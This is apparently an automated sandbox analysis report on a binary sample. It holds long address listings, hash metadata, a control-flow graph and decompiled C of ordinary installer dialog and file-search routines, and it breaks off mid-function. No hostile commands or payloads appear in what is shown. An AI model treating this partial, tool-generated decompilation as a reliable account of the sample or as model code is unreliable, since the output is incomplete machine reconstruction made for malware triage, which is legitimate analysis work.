                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00406f75
                                                                                    0x00406f79
                                                                                    0x00407581
                                                                                    0x00000000
                                                                                    0x00407581
                                                                                    0x00406f7f
                                                                                    0x00406f82
                                                                                    0x00406f85
                                                                                    0x00406f89
                                                                                    0x00406f8c
                                                                                    0x00406f92
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f97
                                                                                    0x00000000
                                                                                    0x00406f97
                                                                                    0x00406db1
                                                                                    0x00406db1
                                                                                    0x00406db4
                                                                                    0x00406dba
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbf
                                                                                    0x00406dc2
                                                                                    0x00406dc4
                                                                                    0x00406dc5
                                                                                    0x00406dc8
                                                                                    0x00406e35
                                                                                    0x00406e35
                                                                                    0x00406e39
                                                                                    0x00406e3c
                                                                                    0x00406e3f
                                                                                    0x00406e42
                                                                                    0x00406e45
                                                                                    0x00406e46
                                                                                    0x00406e49
                                                                                    0x00406e4b
                                                                                    0x00406e51
                                                                                    0x00406e54
                                                                                    0x00406e57
                                                                                    0x00406e5a
                                                                                    0x00406e5d
                                                                                    0x00406e63
                                                                                    0x00406e7f
                                                                                    0x00406e82
                                                                                    0x00406e85
                                                                                    0x00406e88
                                                                                    0x00406e8f
                                                                                    0x00406e95
                                                                                    0x00406e99
                                                                                    0x00406e65
                                                                                    0x00406e65
                                                                                    0x00406e69
                                                                                    0x00406e71
                                                                                    0x00406e76
                                                                                    0x00406e78
                                                                                    0x00406e7a
                                                                                    0x00406e7a
                                                                                    0x00406ea3
                                                                                    0x00406ea6
                                                                                    0x00406e1d
                                                                                    0x00406e1d
                                                                                    0x00406e23
                                                                                    0x00406ed6
                                                                                    0x00406edc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ede
                                                                                    0x00406ee1
                                                                                    0x00406ee4
                                                                                    0x00406ee7
                                                                                    0x00406eea
                                                                                    0x00406eed
                                                                                    0x00406ef0
                                                                                    0x00406ef3
                                                                                    0x00406ef6
                                                                                    0x00406efc
                                                                                    0x00406f14
                                                                                    0x00406f17
                                                                                    0x00406f1a
                                                                                    0x00406f1d
                                                                                    0x00406f1d
                                                                                    0x00406f20
                                                                                    0x00406f26
                                                                                    0x00406efe
                                                                                    0x00406efe
                                                                                    0x00406f06
                                                                                    0x00406f0b
                                                                                    0x00406f0d
                                                                                    0x00406f0f
                                                                                    0x00406f0f
                                                                                    0x00406f30
                                                                                    0x00406f33
                                                                                    0x00406eb1
                                                                                    0x00406eb5
                                                                                    0x00407575
                                                                                    0x00000000
                                                                                    0x00407575
                                                                                    0x00406ebb
                                                                                    0x00406ebe
                                                                                    0x00406ec1
                                                                                    0x00406ec5
                                                                                    0x00406ec8
                                                                                    0x00406ece
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed3
                                                                                    0x00406ed3
                                                                                    0x00406f33
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3e
                                                                                    0x00406f3e
                                                                                    0x00406f41
                                                                                    0x00406f44
                                                                                    0x00406f48
                                                                                    0x0040758d
                                                                                    0x00000000
                                                                                    0x0040758d
                                                                                    0x00406f4e
                                                                                    0x00406f51
                                                                                    0x00406f54
                                                                                    0x00406f57
                                                                                    0x00406f5a
                                                                                    0x00406f5d
                                                                                    0x00406f60
                                                                                    0x00406f62
                                                                                    0x00406f65
                                                                                    0x00406f68
                                                                                    0x00406f6b
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x0040710a
                                                                                    0x0040710a
                                                                                    0x0040710d
                                                                                    0x0040710d
                                                                                    0x00000000
                                                                                    0x0040710d
                                                                                    0x00406e2f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00406df8
                                                                                    0x00406dfc
                                                                                    0x00407569
                                                                                    0x004075e5
                                                                                    0x004075ed
                                                                                    0x004075f4
                                                                                    0x004075f6
                                                                                    0x004075fd
                                                                                    0x00407601
                                                                                    0x00407601
                                                                                    0x00406e02
                                                                                    0x00406e05
                                                                                    0x00406e08
                                                                                    0x00406e0c
                                                                                    0x00406e0f
                                                                                    0x00406e15
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e1a
                                                                                    0x00000000
                                                                                    0x00406e1a
                                                                                    0x00406ea6
                                                                                    0x00406daf
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406bec
                                                                                    0x004075fa
                                                                                    0x004075fa
                                                                                    0x00000000
                                                                                    0x004075fa
                                                                                    0x00406bf2
                                                                                    0x00000000
                                                                                    0x00406bfd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c06
                                                                                    0x00406c09
                                                                                    0x00406c0c
                                                                                    0x00406c10
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c16
                                                                                    0x00406c19
                                                                                    0x00406c1b
                                                                                    0x00406c1c
                                                                                    0x00406c1f
                                                                                    0x00406c21
                                                                                    0x00406c22
                                                                                    0x00406c24
                                                                                    0x00406c27
                                                                                    0x00406c2c
                                                                                    0x00406c31
                                                                                    0x00406c3a
                                                                                    0x00406c4d
                                                                                    0x00406c50
                                                                                    0x00406c5c
                                                                                    0x00406c84
                                                                                    0x00406c86
                                                                                    0x00406c94
                                                                                    0x00406c94
                                                                                    0x00406c98
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c88
                                                                                    0x00406c8b
                                                                                    0x00406c8c
                                                                                    0x00406c8c
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c62
                                                                                    0x00406c67
                                                                                    0x00406c67
                                                                                    0x00406c70
                                                                                    0x00406c78
                                                                                    0x00406c7b
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c9e
                                                                                    0x00406c9e
                                                                                    0x00406ca2
                                                                                    0x0040754e
                                                                                    0x00000000
                                                                                    0x0040754e
                                                                                    0x00406cab
                                                                                    0x00406cbb
                                                                                    0x00406cbe
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc4
                                                                                    0x00406cc8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406cca
                                                                                    0x00406cd0
                                                                                    0x00406cfa
                                                                                    0x00406d00
                                                                                    0x00406d07
                                                                                    0x00000000
                                                                                    0x00406d07
                                                                                    0x00406cd6
                                                                                    0x00406cd9
                                                                                    0x00406cde
                                                                                    0x00406cde
                                                                                    0x00406ce9
                                                                                    0x00406cf1
                                                                                    0x00406cf4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d39
                                                                                    0x00406d3f
                                                                                    0x00406d42
                                                                                    0x00406d4f
                                                                                    0x00406d57
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d0e
                                                                                    0x00406d0e
                                                                                    0x00406d12
                                                                                    0x0040755d
                                                                                    0x00000000
                                                                                    0x0040755d
                                                                                    0x00406d1e
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d2c
                                                                                    0x00406d2f
                                                                                    0x00406d32
                                                                                    0x00406d37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ffe
                                                                                    0x00407002
                                                                                    0x00407020
                                                                                    0x00407023
                                                                                    0x0040702a
                                                                                    0x0040702d
                                                                                    0x00407030
                                                                                    0x00407033
                                                                                    0x00407036
                                                                                    0x00407039
                                                                                    0x0040703b
                                                                                    0x00407042
                                                                                    0x00407043
                                                                                    0x00407045
                                                                                    0x00407048
                                                                                    0x0040704b
                                                                                    0x0040704e
                                                                                    0x0040704e
                                                                                    0x00407053
                                                                                    0x00000000
                                                                                    0x00407053
                                                                                    0x00407004
                                                                                    0x00407007
                                                                                    0x0040700a
                                                                                    0x00407014
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407068
                                                                                    0x0040706c
                                                                                    0x0040708f
                                                                                    0x00407092
                                                                                    0x00407095
                                                                                    0x0040709f
                                                                                    0x0040706e
                                                                                    0x0040706e
                                                                                    0x00407071
                                                                                    0x00407074
                                                                                    0x00407077
                                                                                    0x00407084
                                                                                    0x00407087
                                                                                    0x00407087
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070ab
                                                                                    0x004070af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070b5
                                                                                    0x004070b9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070bf
                                                                                    0x004070c1
                                                                                    0x004070c5
                                                                                    0x004070c5
                                                                                    0x004070c8
                                                                                    0x004070cc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040711c
                                                                                    0x00407120
                                                                                    0x00407127
                                                                                    0x0040712a
                                                                                    0x0040712d
                                                                                    0x00407137
                                                                                    0x00000000
                                                                                    0x00407137
                                                                                    0x00407122
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407143
                                                                                    0x00407147
                                                                                    0x0040714e
                                                                                    0x00407151
                                                                                    0x00407154
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407157
                                                                                    0x0040715a
                                                                                    0x0040715d
                                                                                    0x0040715d
                                                                                    0x00407160
                                                                                    0x00407163
                                                                                    0x00407166
                                                                                    0x00407166
                                                                                    0x00407169
                                                                                    0x00407170
                                                                                    0x00407175
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407203
                                                                                    0x00407203
                                                                                    0x00407207
                                                                                    0x004075a5
                                                                                    0x00000000
                                                                                    0x004075a5
                                                                                    0x0040720d
                                                                                    0x00407210
                                                                                    0x00407213
                                                                                    0x00407217
                                                                                    0x0040721a
                                                                                    0x00407220
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407225
                                                                                    0x00407228
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407286
                                                                                    0x00407286
                                                                                    0x0040728a
                                                                                    0x004075b1
                                                                                    0x00000000
                                                                                    0x004075b1
                                                                                    0x00407290
                                                                                    0x00407293
                                                                                    0x00407296
                                                                                    0x0040729a
                                                                                    0x0040729d
                                                                                    0x004072a3
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407056
                                                                                    0x00407056
                                                                                    0x00407059
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407395
                                                                                    0x00407399
                                                                                    0x004073bb
                                                                                    0x004073be
                                                                                    0x004073c8
                                                                                    0x00000000
                                                                                    0x004073c8
                                                                                    0x0040739b
                                                                                    0x0040739e
                                                                                    0x004073a2
                                                                                    0x004073a5
                                                                                    0x004073a5
                                                                                    0x004073a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407452
                                                                                    0x00407456
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x0040747b
                                                                                    0x00407482
                                                                                    0x00407489
                                                                                    0x00407489
                                                                                    0x00000000
                                                                                    0x00407489
                                                                                    0x00407458
                                                                                    0x0040745b
                                                                                    0x0040745e
                                                                                    0x00407461
                                                                                    0x00407468
                                                                                    0x004073ac
                                                                                    0x004073ac
                                                                                    0x004073af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407543
                                                                                    0x00407546
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040717d
                                                                                    0x0040717f
                                                                                    0x00407186
                                                                                    0x00407187
                                                                                    0x00407189
                                                                                    0x0040718c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407194
                                                                                    0x00407197
                                                                                    0x0040719a
                                                                                    0x0040719c
                                                                                    0x0040719e
                                                                                    0x0040719e
                                                                                    0x0040719f
                                                                                    0x004071a2
                                                                                    0x004071a9
                                                                                    0x004071ac
                                                                                    0x004071ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407490
                                                                                    0x00407490
                                                                                    0x00407493
                                                                                    0x0040749a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040749f
                                                                                    0x0040749f
                                                                                    0x004074a3
                                                                                    0x004075db
                                                                                    0x00000000
                                                                                    0x004075db
                                                                                    0x004074a9
                                                                                    0x004074ac
                                                                                    0x004074af
                                                                                    0x004074b3
                                                                                    0x004074b6
                                                                                    0x004074bc
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074c1
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c7
                                                                                    0x004074c7
                                                                                    0x004074cb
                                                                                    0x0040752b
                                                                                    0x0040752e
                                                                                    0x00407533
                                                                                    0x00407534
                                                                                    0x00407536
                                                                                    0x00407538
                                                                                    0x0040753b
                                                                                    0x00000000
                                                                                    0x0040753b
                                                                                    0x004074cd
                                                                                    0x004074d3
                                                                                    0x004074d6
                                                                                    0x004074d9
                                                                                    0x004074dc
                                                                                    0x004074df
                                                                                    0x004074e2
                                                                                    0x004074e5
                                                                                    0x004074e8
                                                                                    0x004074eb
                                                                                    0x004074ee
                                                                                    0x00407507
                                                                                    0x0040750a
                                                                                    0x0040750d
                                                                                    0x00407510
                                                                                    0x00407514
                                                                                    0x00407516
                                                                                    0x00407516
                                                                                    0x00407517
                                                                                    0x0040751a
                                                                                    0x004074f0
                                                                                    0x004074f0
                                                                                    0x004074f8
                                                                                    0x004074fd
                                                                                    0x004074ff
                                                                                    0x00407502
                                                                                    0x00407502
                                                                                    0x0040751d
                                                                                    0x00407524
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x004071c2
                                                                                    0x004071c5
                                                                                    0x004071fb
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732e
                                                                                    0x0040732e
                                                                                    0x00407331
                                                                                    0x00407333
                                                                                    0x004075bd
                                                                                    0x00000000
                                                                                    0x004075bd
                                                                                    0x00407339
                                                                                    0x0040733c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407342
                                                                                    0x00407346
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00000000
                                                                                    0x00407349
                                                                                    0x004071c7
                                                                                    0x004071c9
                                                                                    0x004071cb
                                                                                    0x004071cd
                                                                                    0x004071d0
                                                                                    0x004071d1
                                                                                    0x004071d3
                                                                                    0x004071d5
                                                                                    0x004071d8
                                                                                    0x004071db
                                                                                    0x004071f1
                                                                                    0x004071f6
                                                                                    0x0040722e
                                                                                    0x0040722e
                                                                                    0x00407232
                                                                                    0x0040725e
                                                                                    0x00407260
                                                                                    0x00407267
                                                                                    0x0040726a
                                                                                    0x0040726d
                                                                                    0x0040726d
                                                                                    0x00407272
                                                                                    0x00407272
                                                                                    0x00407274
                                                                                    0x00407277
                                                                                    0x0040727e
                                                                                    0x00407281
                                                                                    0x004072ae
                                                                                    0x004072ae
                                                                                    0x004072b1
                                                                                    0x004072b4
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00000000
                                                                                    0x00407328
                                                                                    0x004072b6
                                                                                    0x004072bc
                                                                                    0x004072bf
                                                                                    0x004072c2
                                                                                    0x004072c5
                                                                                    0x004072c8
                                                                                    0x004072cb
                                                                                    0x004072ce
                                                                                    0x004072d1
                                                                                    0x004072d4
                                                                                    0x004072d7
                                                                                    0x004072f0
                                                                                    0x004072f2
                                                                                    0x004072f5
                                                                                    0x004072f6
                                                                                    0x004072f9
                                                                                    0x004072fb
                                                                                    0x004072fe
                                                                                    0x00407300
                                                                                    0x00407302
                                                                                    0x00407305
                                                                                    0x00407307
                                                                                    0x0040730a
                                                                                    0x0040730e
                                                                                    0x00407310
                                                                                    0x00407310
                                                                                    0x00407311
                                                                                    0x00407314
                                                                                    0x00407317
                                                                                    0x004072d9
                                                                                    0x004072d9
                                                                                    0x004072e1
                                                                                    0x004072e6
                                                                                    0x004072e8
                                                                                    0x004072eb
                                                                                    0x004072eb
                                                                                    0x0040731a
                                                                                    0x00407321
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00407321
                                                                                    0x00407234
                                                                                    0x00407237
                                                                                    0x00407239
                                                                                    0x0040723c
                                                                                    0x0040723f
                                                                                    0x00407242
                                                                                    0x00407244
                                                                                    0x00407247
                                                                                    0x0040724a
                                                                                    0x0040724a
                                                                                    0x0040724d
                                                                                    0x0040724d
                                                                                    0x00407250
                                                                                    0x00407257
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00407257
                                                                                    0x004071dd
                                                                                    0x004071e0
                                                                                    0x004071e2
                                                                                    0x004071e5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070cf
                                                                                    0x004070cf
                                                                                    0x004070d3
                                                                                    0x00407599
                                                                                    0x00000000
                                                                                    0x00407599
                                                                                    0x004070d9
                                                                                    0x004070dc
                                                                                    0x004070df
                                                                                    0x004070e2
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e7
                                                                                    0x004070ea
                                                                                    0x004070ed
                                                                                    0x004070f0
                                                                                    0x004070f3
                                                                                    0x004070f6
                                                                                    0x004070f7
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070fc
                                                                                    0x004070ff
                                                                                    0x00407102
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407108
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x00407350
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407356
                                                                                    0x00407359
                                                                                    0x0040735c
                                                                                    0x0040735f
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407364
                                                                                    0x00407367
                                                                                    0x0040736a
                                                                                    0x0040736d
                                                                                    0x00407370
                                                                                    0x00407373
                                                                                    0x00407374
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407379
                                                                                    0x0040737c
                                                                                    0x0040737f
                                                                                    0x00407382
                                                                                    0x00407385
                                                                                    0x00407389
                                                                                    0x0040738b
                                                                                    0x0040738e
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x0040738e
                                                                                    0x004075c3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                    • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                                                    • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                    • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0040699E(WCHAR* _a4) {
                                                                                    				void* _t2;
                                                                                    
                                                                                    				_t2 = FindFirstFileW(_a4, 0x426798); // executed
                                                                                    				if(_t2 == 0xffffffff) {
                                                                                    					return 0;
                                                                                    				}
                                                                                    				FindClose(_t2);
                                                                                    				return 0x426798;
                                                                                    			}




                                                                                    0x004069a9
                                                                                    0x004069b2
                                                                                    0x00000000
                                                                                    0x004069bf
                                                                                    0x004069b5
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(7476FAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560), ref: 004069A9
                                                                                    • FindClose.KERNEL32(00000000), ref: 004069B5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                    • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                                                    • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                    • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 143->146 149 4040f4-404101 SetWindowPos 144->149 150 404107-40410e 144->150 147 4042f1-4042f6 call 404610 145->147 148 4042b3-4042b6 145->148 167 40428f-404297 146->167 163 4042fb-404316 147->163 152 4042b8-4042c3 call 401389 148->152 153 4042e9-4042eb 148->153 149->150 155 404110-40412a ShowWindow 150->155 156 404152-404158 150->156 152->153 177 4042c5-4042e4 SendMessageW 152->177 153->147 162 404591 153->162 164 404130-404143 GetWindowLongW 155->164 165 40422b-404239 call 40462b 155->165 158 404171-404174 156->158 159 40415a-40416c DestroyWindow 156->159 169 404176-404182 SetWindowLongW 158->169 170 404187-40418d 158->170 166 40456e-404574 159->166 168 404593-40459a 162->168 173 404318-40431a call 40140b 163->173 174 40431f-404325 163->174 164->165 175 404149-40414c ShowWindow 164->175 165->168 166->162 180 404576-40457c 166->180 167->145 169->168 170->165 176 404193-4041a2 GetDlgItem 170->176 173->174 181 40432b-404336 174->181 182 40454f-404568 DestroyWindow EndDialog 174->182 175->156 184 4041c1-4041c4 176->184 185 4041a4-4041bb SendMessageW IsWindowEnabled 176->185 177->168 180->162 186 40457e-404587 ShowWindow 180->186 181->182 183 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 181->183 182->166 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 183->213 214 40438b-404390 183->214 188 4041c6-4041c7 184->188 189 4041c9-4041cc 184->189 185->162 185->184 186->162 191 4041f7-4041fc call 40459d 188->191 192 4041da-4041df 189->192 193 4041ce-4041d4 189->193 191->165 196 404215-404225 SendMessageW 192->196 198 4041e1-4041e7 192->198 193->196 197 4041d6-4041d8 193->197 196->165 197->191 201 4041e9-4041ef call 40140b 198->201 202 4041fe-404207 call 40140b 198->202 209 4041f5 201->209 202->165 211 404209-404213 202->211 209->191 211->209 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->163 233 404464-404466 222->233 233->163 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->162 237 40447e-404484 235->237 236->166 238 4044a9-4044d6 CreateDialogParamW 236->238 237->163 239 40448a 237->239 238->166 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 404535-40454d ShowWindow call 404610 240->245 245->166
                                                                                    C-Code - Quality: 84%
                                                                                    			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                                                    				struct HWND__* _v28;
                                                                                    				void* _v84;
                                                                                    				void* _v88;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				signed int _t34;
                                                                                    				signed int _t36;
                                                                                    				signed int _t38;
                                                                                    				struct HWND__* _t48;
                                                                                    				signed int _t67;
                                                                                    				struct HWND__* _t73;
                                                                                    				signed int _t86;
                                                                                    				struct HWND__* _t91;
                                                                                    				signed int _t99;
                                                                                    				int _t103;
                                                                                    				signed int _t117;
                                                                                    				int _t118;
                                                                                    				int _t122;
                                                                                    				signed int _t124;
                                                                                    				struct HWND__* _t127;
                                                                                    				struct HWND__* _t128;
                                                                                    				int _t129;
                                                                                    				intOrPtr _t130;
                                                                                    				long _t133;
                                                                                    				int _t135;
                                                                                    				int _t136;
                                                                                    				void* _t137;
                                                                                    				void* _t145;
                                                                                    
                                                                                    				_t130 = _a8;
                                                                                    				if(_t130 == 0x110 || _t130 == 0x408) {
                                                                                    					_t34 = _a12;
                                                                                    					_t127 = _a4;
                                                                                    					__eflags = _t130 - 0x110;
                                                                                    					 *0x423730 = _t34;
                                                                                    					if(_t130 == 0x110) {
                                                                                    						 *0x42a268 = _t127;
                                                                                    						 *0x423744 = GetDlgItem(_t127, 1);
                                                                                    						_t91 = GetDlgItem(_t127, 2);
                                                                                    						_push(0xffffffff);
                                                                                    						_push(0x1c);
                                                                                    						 *0x421710 = _t91;
                                                                                    						E004045C4(_t127);
                                                                                    						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
                                                                                    						 *0x42922c = E0040140B(4);
                                                                                    						_t34 = 1;
                                                                                    						__eflags = 1;
                                                                                    						 *0x423730 = 1;
                                                                                    					}
                                                                                    					_t124 =  *0x40a39c; // 0x0
                                                                                    					_t136 = 0;
                                                                                    					_t133 = (_t124 << 6) +  *0x42a280;
                                                                                    					__eflags = _t124;
                                                                                    					if(_t124 < 0) {
                                                                                    						L36:
                                                                                    						E00404610(0x40b);
                                                                                    						while(1) {
                                                                                    							_t36 =  *0x423730;
                                                                                    							 *0x40a39c =  *0x40a39c + _t36;
                                                                                    							_t133 = _t133 + (_t36 << 6);
